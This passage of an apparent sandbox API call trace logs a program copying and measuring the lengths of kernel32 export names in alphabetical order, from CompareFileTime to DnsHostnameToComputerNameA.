lpString1="CompareFileTime") returned="CompareFileTime" [0087.781] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.781] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.781] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.781] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.781] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.781] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.781] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.781] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.781] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.781] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.781] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.781] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.781] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.782] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.782] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.782] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.782] lstrlenA (lpString="COPYFILEA") returned 9 [0087.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.782] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.782] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.782] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.782] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.782] lstrlenA (lpString="COPYFILEW") returned 9 [0087.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.782] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.782] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.782] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.782] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.782] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.782] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.782] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.782] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.782] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.782] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.782] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.783] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.783] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.783] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.783] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.783] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.783] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.783] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.783] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.783] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.783] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.783] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.783] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.783] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.783] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.783] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.783] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.783] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.783] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.783] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.784] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.784] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.784] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.784] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.784] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.784] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.784] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.784] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.784] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.784] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.784] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.784] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.784] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.784] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.784] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.784] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.784] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.784] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.784] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.784] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.784] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.784] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.784] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.784] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.784] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.784] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.784] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.784] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.784] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.784] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.784] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.784] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.784] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.784] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.784] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.784] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.784] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.784] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.785] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.785] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.785] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.785] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.785] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.785] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.785] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.785] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.785] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.785] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.785] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.785] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.785] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.785] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.785] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.785] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.785] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.785] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.785] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.785] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.785] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.785] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.785] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.785] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.785] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.785] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.785] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.785] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.785] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.785] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.785] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.785] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.785] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.785] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.785] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.785] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.786] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.786] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.786] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.786] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.786] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.786] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.786] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.786] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.786] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.786] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.786] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.786] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.786] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.786] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.786] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.786] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.786] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.786] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.786] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.786] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.786] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.786] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.786] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.786] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.786] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.786] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.786] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.786] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.786] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.786] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.786] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.786] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.786] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.786] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.786] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.786] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.786] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.786] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.786] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.787] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.787] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.787] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.787] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.787] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.787] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.787] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.787] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.787] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.787] lstrlenA (lpString="DELETEATOM") returned 10 [0087.787] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.787] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.787] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.787] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.787] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.787] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.787] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.787] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.787] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.787] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.787] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.787] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.787] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.787] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.787] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.787] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.787] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.787] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.787] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.787] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.787] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.787] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.787] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.787] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.787] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.787] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.787] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.787] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.788] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.788] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.788] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.788] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.788] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.788] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.788] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.788] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.788] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: 